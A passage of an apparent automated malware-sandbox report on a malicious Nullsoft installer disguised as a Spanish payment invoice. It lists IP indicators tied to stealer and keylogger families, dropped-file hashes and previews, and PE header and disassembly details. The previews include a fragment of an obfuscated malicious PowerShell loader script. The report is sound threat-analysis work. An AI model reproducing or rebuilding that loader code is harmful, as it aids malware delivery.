                                                                            KIDy5J5su4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            TELEGRAMRURFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Unlock_Tool_2.3.1.exeGet hashmaliciousVidarBrowse
                                                                            • 149.154.167.99
                                                                            aZm1EZ2IYr.exeGet hashmaliciousVidarBrowse
                                                                            • 149.154.167.99
                                                                            Unlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                            • 149.154.167.99
                                                                            PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            routcrying.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            mnobizx.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.Win32.DropperX-gen.7855.32539.exeGet hashmaliciousXehook StealerBrowse
                                                                            • 149.154.167.99
                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                            • 172.67.206.204
                                                                            http://www.5movierulz.momGet hashmaliciousUnknownBrowse
                                                                            • 172.67.72.9
                                                                            http://lvlup.pageGet hashmaliciousUnknownBrowse
                                                                            • 172.67.184.158
                                                                            http://google.comGet hashmaliciousUnknownBrowse
                                                                            • 172.64.41.3
                                                                            https://bbs-file.jiaxiao.pub/94f0e5e6a233429db4c5be400e2eb471/post/2024/03/29/933660672770703360.zipGet hashmaliciousUnknownBrowse
                                                                            • 1.1.1.1
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.206.204
                                                                            rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 172.67.155.139
                                                                            Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 104.26.13.205
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                            • 104.21.53.8
                                                                            #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            ORACLE-BMC-31898US#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                            • 158.101.44.242
                                                                            RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 158.101.44.242
                                                                            bin.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 130.61.149.67
                                                                            LNLAncf2v5.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 150.136.183.134
                                                                            SecuriteInfo.com.Win32.TrojanX-gen.28573.1762.exeGet hashmaliciousUnknownBrowse
                                                                            • 168.138.162.78
                                                                            PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 193.122.6.168
                                                                            la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                            • 130.61.64.122
                                                                            la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                            • 140.238.9.118
                                                                            la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                            • 129.146.244.172
                                                                            arm4.elfGet hashmaliciousUnknownBrowse
                                                                            • 152.67.250.195
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            54328bd36c14bd82ddaa0c04b25ed9ad#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            routcrying.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            mnobizx.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            SecuriteInfo.com.Win32.DropperX-gen.11998.28068.exeGet hashmaliciousAtlantida StealerBrowse
                                                                            • 188.114.97.3
                                                                            rcota____oRFQNO-N__merodopedido106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            Wuerth_factura_4052073226..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            NEW CUSTOMER ORDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            3b5074b1b5d032e5620f69f9f700ff0ehttps://weiderergmbh-my.sharepoint.de/:o:/g/personal/s_kreuzer_luxapark_de/En8ihQEtXF1HtuEzkWTEmvQBXZUe8GC_guY4c0qSMi2Czg?e=5%3aJCIXIb&at=9Get hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 149.154.167.220
                                                                            Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 149.154.167.220
                                                                            RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            http://heks.egrowbrands.com/lopsa/67057a2256a25_SwiftKey.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            http://lide.omernisar.com/lopsa/66daf6d8ac980_PeakSports.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.Win64.MalwareX-gen.7443.30781.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            37f463bf4616ecd445d4a1937da06e19rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 216.58.206.33
                                                                            • 142.250.185.206
                                                                            450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                                                            • 216.58.206.33
                                                                            • 142.250.185.206
                                                                            450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                                                            • 216.58.206.33
                                                                            • 142.250.185.206
                                                                            3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                                                            • 216.58.206.33
                                                                            • 142.250.185.206
                                                                            Unlock_Tool_2.3.1.exeGet hashmaliciousVidarBrowse
                                                                            • 216.58.206.33
                                                                            • 142.250.185.206
                                                                            3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                                                            • 216.58.206.33
                                                                            • 142.250.185.206
                                                                            aZm1EZ2IYr.exeGet hashmaliciousVidarBrowse
                                                                            • 216.58.206.33
                                                                            • 142.250.185.206
                                                                            Unlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                            • 216.58.206.33
                                                                            • 142.250.185.206
                                                                            JuyR4wj8av.exeGet hashmaliciousStealc, VidarBrowse
                                                                            • 216.58.206.33
                                                                            • 142.250.185.206
                                                                            SecuriteInfo.com.FileRepMalware.4445.21502.exeGet hashmaliciousUnknownBrowse
                                                                            • 216.58.206.33
                                                                            • 142.250.185.206
                                                                            No context
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):14744
                                                                            Entropy (8bit):4.992175361088568
                                                                            Encrypted:false
                                                                            SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                            MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                            SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                            SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                            SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):343001
                                                                            Entropy (8bit):7.668329656070028
                                                                            Encrypted:false
                                                                            SSDEEP:6144:AKRx5F2Bh8Q/UFTrg0VK6cVwsQbQMmBfUvg+PJrcWMuAobE365o6XqpExo:1750B3Urg0Vr9s3BMvLPlN8T65LqpExo
                                                                            MD5:3E7867EF75817E3ACC839677D6A3953B
                                                                            SHA1:7F4345E47DA8AD82BB351F50E340A5B40FAC5888
                                                                            SHA-256:71309200562392E24C8C8EBEA2369ECF3652F8155400B2A485D58569BB0110CC
                                                                            SHA-512:1D37506579139E5370E86A7DCD5C344FF961A79160A5C48BF98857274518A8313327BC1E9B2FC9A6E185D31AD891676A75468D18A661332DDF47D8099A69F996
                                                                            Malicious:false
                                                                            Preview:..u...e.r....@@@@............x...................z..............|||.h...`.......II.......pp.WW......y.....................U.....?...............\.......................bb.....ZZZ...yy..................TT......uuu....a.................................$$$$.........j....TT.......................[[...................c...F......""""..........&....i.....``````..$$$.+++++.$$.............+++........g..................T..}.............".._...............d...........!!!...iii..........11.................h..(......E...................s..........2.........q.........5........SS...4.^^^^....W......... ....2222.LLLLL.4...............AA..//....<.............E..................+.Z.=.......h.P.........{.@.......rr....ZZ....Y............SSSS........TTTTT.................Y.............-.{...p......GGG........,.....JJ......iii.........TT.............0..}}............................j........i.............ss.......TT.N.EEEEE.LLL........A....;...AA................gg........................SSSSSS....d.8..222
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Category:dropped
                                                                            Size (bytes):895897
                                                                            Entropy (8bit):7.722614502313072
                                                                            Encrypted:false
                                                                            SSDEEP:24576:/FxyAEp6l1UyqTxWBhc+alCJmvulW6Nd0va:3ykYxTxA2+m7mwMAa
                                                                            MD5:400AE56B0E2F429C20F563959042B2E9
                                                                            SHA1:383B18E2E55A4F7BEA251CC82AEC9CDAE9F22FED
                                                                            SHA-256:7E6DE6E460EC2322A30DFECA3A723811D3AC15486FA2139A3454EDBC7B1927DF
                                                                            SHA-512:CB9DF99342BA1B59461F14256790E40D82DB0D989E496B1E7EE3BAAEEA29DE464F307831CC43688261A8E55A067D8D5538EFDD3185695518C70CC84A67C3A827
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 11%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L....{.W.................`...|.......1.......p....@.......................................@.................................4u....... ..X............................................................................p...............................text...._.......`.................. ..`.rdata..R....p.......d..............@..@.data....T...........x..............@....ndata...0...............................rsrc...X.... .......~..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:true
                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                            Process:C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
                                                                            File Type:GTA audio index data (SDT)
                                                                            Category:dropped
                                                                            Size (bytes):339224
                                                                            Entropy (8bit):3.2329059465811363
                                                                            Encrypted:false
                                                                            SSDEEP:3072:TlwUufGWwltoSeWq5Xck5tiy5ScV95Cca+8aB5p0jsDytfuWoaP/ZTf:x3W045X/5tiyB8faB5p4sD22uN
                                                                            MD5:2AFAF6367CF5833A8885999FEFA5B44A
                                                                            SHA1:58EDFAC56FD3BDA98CAD7F2A784F58CF0CCCA5A9
                                                                            SHA-256:66D0440913A064549BF52DD102475A422A55A0A1A99A38C0445CCF84EB98C074
                                                                            SHA-512:A769F552CD91CE7163FE25C6E785D3A225979A9E50805F031C05E52CF5F82FB1E582FE621C947C7B0709F9E627C6CF318CF899CA97CC2BC4A3D934B94C2279A4
                                                                            Malicious:false
                                                                            Preview:........5M.....]...................[8...........t...........j.kKk.............Y.3.-.........u.....'.......<..............0..............-.....m....q.%.........S....F......6.............M.C.z.........m.|..............m...].-..<.......0.............o......QL....x....... ..........p.........?.'.a........:.........K............................#............Z).......$......................................9......................_u...1...S>............................c....K\......l.......z............%..(..........8...........z.........\....$......._.g...........v.....{R..............;.............R........1........:...Q...........W..W....................................F .....-...b..F........G...,CH......}...D....b...........9...8...q......Y....R..............................................<..............=...~................. ...........u.......T...B..............i............`....r...........R..............1.2........................../....#.......b.............;...............-..+
                                                                            Process:C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):91155
                                                                            Entropy (8bit):3.2484639775571122
                                                                            Encrypted:false
                                                                            SSDEEP:768:sx0eYUpSjZTH4Refp/ZwLfKCGhiKveAC4LjJNV8RHwnx/F0H0jbPYER9RLXLxFJi:8UhyD9meQZFRRbLXdDRseVQq4
                                                                            MD5:55DD84338306B8F361571D07E3D03F25
                                                                            SHA1:5F086147B0ED6D4CBE40B6F81C1003EB07714B94
                                                                            SHA-256:016DE5BD5CEBA70CD0041265F69BE3BB6FF54D3DCA19340ED44DC15317066E45
                                                                            SHA-512:045E39931094C1D423D69C4BEF750CACF56E0DEF562162211F51F1B5E0C3E265ACEDE7FC06979CFCE68762A99180317419685E5542D3E44882B11116D1EE7FE8
                                                                            Malicious:false
                                                                            Preview:....7.................3.........}.......Q.....................~........y.........u...4...bp..o......z.......................................................k.............Tg.....`..Q.........<........A........f.....X..."..............^.........@....|..........................h....X..................1.......zh...........3..>..)...Y....:.................GG.....+F#...z.~.....!....................:..............(.................Y....7.......5..^..{.......D...`................O..............z#..............4$...a..............o....................c..s.......=......^..~..................................B....o.......................................l:...........*Y..i.".C..i............_.........).....-...............|P.......b......h....~.....w+....................-....1.......<...6.........b.".@...................1...P....s..h9.......l........H..................k...e........<.......f...;...............m....W...........h.g.%...........-........."..................S......F.....e........
                                                                            Process:C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):411197
                                                                            Entropy (8bit):3.2412073600303604
                                                                            Encrypted:false
                                                                            SSDEEP:6144:QuopzWTN5dkmo9X81LoYHLr0FJfFYcRQOD:KkxkfDEC
                                                                            MD5:9548F6F7A71852794789DE0AC5FDE451
                                                                            SHA1:74C915E2C9C110929FD87C907BE17930B0B66B24
                                                                            SHA-256:2D3371072047972236B2BAD7280E34BA1FD041C99CD132BC0E1DD767D0AFC471
                                                                            SHA-512:0468FCA29C3F916CBC0B3B132EA24BB582ED0F0D4921523F5DF6EE17F76709437D25324E08AF3C43FCAE8BD1B9F388E49B64ED3C8464062E7D099B0D6B9BC5DE
                                                                            Malicious:false
                                                                            Preview:....u*...........................*................................#.k4..`.......K....................7F#.....-....................Z.........v.................#.............p...<.....5.j...........p....j....... 4.....h................q.2.......C..................................,.............\........#..................e..........b.........................o..8.e........'.Q......<..........e.x...8......=.......}.....QU......E.....O............................6....^.y.....~........i..........................Q..`.>...........m..........,................6/..._..f....\.........`.y.............................6...............2[........................)..........................<....7......6..................8.....................................b...........................3.....U.......N.........k8.x.........................)~..............o.....+.............6............Y.>....................e.J....S...t..........K........................P\.............r...................... ............
                                                                            Process:C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x512, components 3
                                                                            Category:dropped
                                                                            Size (bytes):15845
                                                                            Entropy (8bit):7.693658939604953
                                                                            Encrypted:false
                                                                            SSDEEP:384:dnSPb8riksvdEh0qrjVqIPrLgrpNQMUBWud20p:dnUwriksvMjrZqo3Up9U8ud20p
                                                                            MD5:762778DFE1B62D3430B44A32AEDC03E0
                                                                            SHA1:7317D9579F9F4C4BEF82BE64FB3DFFB63160EEC5
                                                                            SHA-256:9A602EBAFC1F46AAD7248F6DA82938CE382DE9FFBC6C472BD4848D4519CA67A8
                                                                            SHA-512:B39A8F6DC07F3A4CFE3CF5E1563543ECE2864FECED28282356FA64D7D0B50FA43B70F57FC8A2C4424A553E14E6BE526293D90F56C63994EC79F5520488EE0CCF
                                                                            Malicious:false
                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..IE..'...Ph.....(....(...)(...(....(...J`.QI@.(....(.....(....(....)(...).f..(.......Q@.%.P.IE..RQE...Q@..).RQE...Q@.%.P.IE...%.P.IE..RQE.mQE..bQE..QE%..QE......QE%..QE.......QI@..Q@.%.P.IE..RQE..QI@..RP.E.....RS.i(...%.P.IE%.-%.P.IE..RQE...Q@..).RQE...Q@.%.P0....J(...-%.P.IE...IE..aE...QE..QE%..QE.%.Q@...S...J..QI@.IE..RQE...Q@..RP.E...QE%0.(...%...-%...QE..RQE...Q@.%.P0
                                                                            Process:C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
                                                                            File Type:ASCII text, with very long lines (3113), with CRLF, LF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):54853
                                                                            Entropy (8bit):5.343396156779685
                                                                            Encrypted:false
                                                                            SSDEEP:1536:rPamKP6L416FHUmCNBYsKvWubxxebyGOKYCpdvJd:rbKg7UmCHYxb2RvP
                                                                            MD5:49EFAA361FA814AE9123A4402A61A0D1
                                                                            SHA1:FB0D528BD5092DB2EDBF5CDFD170C4F99F95DE3E
                                                                            SHA-256:F60736C8AE2A891DD30ED3139B9A809F6DB0A8073E6407F9FD3EA05CEE092D5D
                                                                            SHA-512:FFF32029EEEC0B5FF646941E636AC698220C1229EEC0DC85060800DA2F41382BB53537547D4A3BC7AE59D4FF68AE5FC71FE1FC5B50B89DF12DBF4337DCD1350F
                                                                            Malicious:true
                                                                            Preview:$Skriveheftes=$vennetjenesterne;..<#Snkens Overtenseness Dihalid Forfrysnings #>..<#Storgodsejers Behagelighederne Bristninger #>..<#rektifikationen Micromelus Thistles Periderm Stvleskaft Stedfaders #>..<#Sommerfugles hellgrammites Gumpetung Enjambed Vigorlesses Sabal #>..<#Antisacerdotalist Evisite Natational Dedicant Noergaard Teskeria #>..<#Salatfade Triumvirship Vatersotigheden #>...$Blokindskud = @'.Fict . Epi,$ConeeKSkrivnlungeoSeptag.ttemlPrin ePhy or Vold2Sor,k2 Baan0Korp =,idsn$ Rei,SDoomsiNon kxMezzotEpigri avignCise sP trokCallge Husesslang;K yst.TaknefRetaluMennenMocamc BandtPujahiAns do HjttnUdski uscW Stroa,orelvTmrereLunhewExclaiFrugtsEulale Anke Grudg(Patri$SnefyFPhoniyprofilObstrdZelmae Pranb hi,ptBet etDrif e P ycnRi ge,Enkel$ .ortSShoesuKern b oetj andeIslndc UndetAlludiKrftovMuc.leCy,ba)melle Prei.{ atio.Befli.Stubr$S,nkrKPlopdaHeimerWar,it Insio Prfaf .unsf danse Ragwl PeromDiscoeCriedlSag bsVidunfColona PayabV nyarGdniniBlokfk CockkAnsi e,litwr ccuss jort sym
                                                                            Process:C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
                                                                            File Type:ASCII text, with very long lines (360), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):362
                                                                            Entropy (8bit):4.295609901239941
                                                                            Encrypted:false
                                                                            SSDEEP:6:OV0mI/AA3CU6sDq6ry0bxmAOvFz0/TWEMsesxM7JXZO:OVcAV6yw3Ovx0/q3shK7Js
                                                                            MD5:A47DE65B255D62E154E75208730B37D2
                                                                            SHA1:9AD95C489EABDBCD12C02CD312C85D0C73A565F7
                                                                            SHA-256:1527C27BE377FB2EFDB75E64EF88FEE6B879712DEC1AE6E8CCA4E66188099784
                                                                            SHA-512:206FB780CA6A6BEA7B1DA2AAD8D1E8C38331AE5A03CC82FC181A6E13234DC4523033AA775A3F15C261FEC74910ECAF622ABAC99444E8DAA8B63EC35379FBE29A
                                                                            Malicious:false
                                                                            Preview:beboere sletteprogrammerne afbrndtes untruthfulness,methanolysis blokniveauets tegnbaseret keisar arbejdsmndene rger,lsenets quindecimvir complexify hundevagten cymblernes.cressier immediate batchkrslerne antisepalous cryptonymic pings,pampination spytkirtlen vandranunkel stormmaage,diversificer udtalendes attributgrammatiks snedkeris sati frailejon rvturene..
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Entropy (8bit):7.722614502313072
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:PAGO FRAS. AGOSTO 2024..exe
                                                                            File size:895'897 bytes
                                                                            MD5:400ae56b0e2f429c20f563959042b2e9
                                                                            SHA1:383b18e2e55a4f7bea251cc82aec9cdae9f22fed
                                                                            SHA256:7e6de6e460ec2322a30dfeca3a723811d3ac15486fa2139a3454edbc7b1927df
                                                                            SHA512:cb9df99342ba1b59461f14256790e40d82db0d989e496b1e7ee3baaeea29de464f307831cc43688261a8e55a067d8d5538efdd3185695518c70cc84a67c3a827
                                                                            SSDEEP:24576:/FxyAEp6l1UyqTxWBhc+alCJmvulW6Nd0va:3ykYxTxA2+m7mwMAa
                                                                            TLSH:5F152257FBA4DCA7E865823010BE9532F2326D3654209647739EBF7A453333E491B2CA
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....{.W.................`...|.....
                                                                            Icon Hash:4ccc524656d64e01
                                                                            Entrypoint:0x40310f
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x57807BD9 [Sat Jul 9 04:21:45 2016 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                                            Instruction
                                                                            sub esp, 00000184h
                                                                            push ebx
                                                                            push esi
                                                                            push edi
                                                                            xor ebx, ebx
                                                                            push 00008001h
                                                                            mov dword ptr [esp+18h], ebx
                                                                            mov dword ptr [esp+10h], 00409198h
                                                                            mov dword ptr [esp+20h], ebx
                                                                            mov byte ptr [esp+14h], 00000020h
                                                                            call dword ptr [004070A8h]
                                                                            call dword ptr [004070A4h]
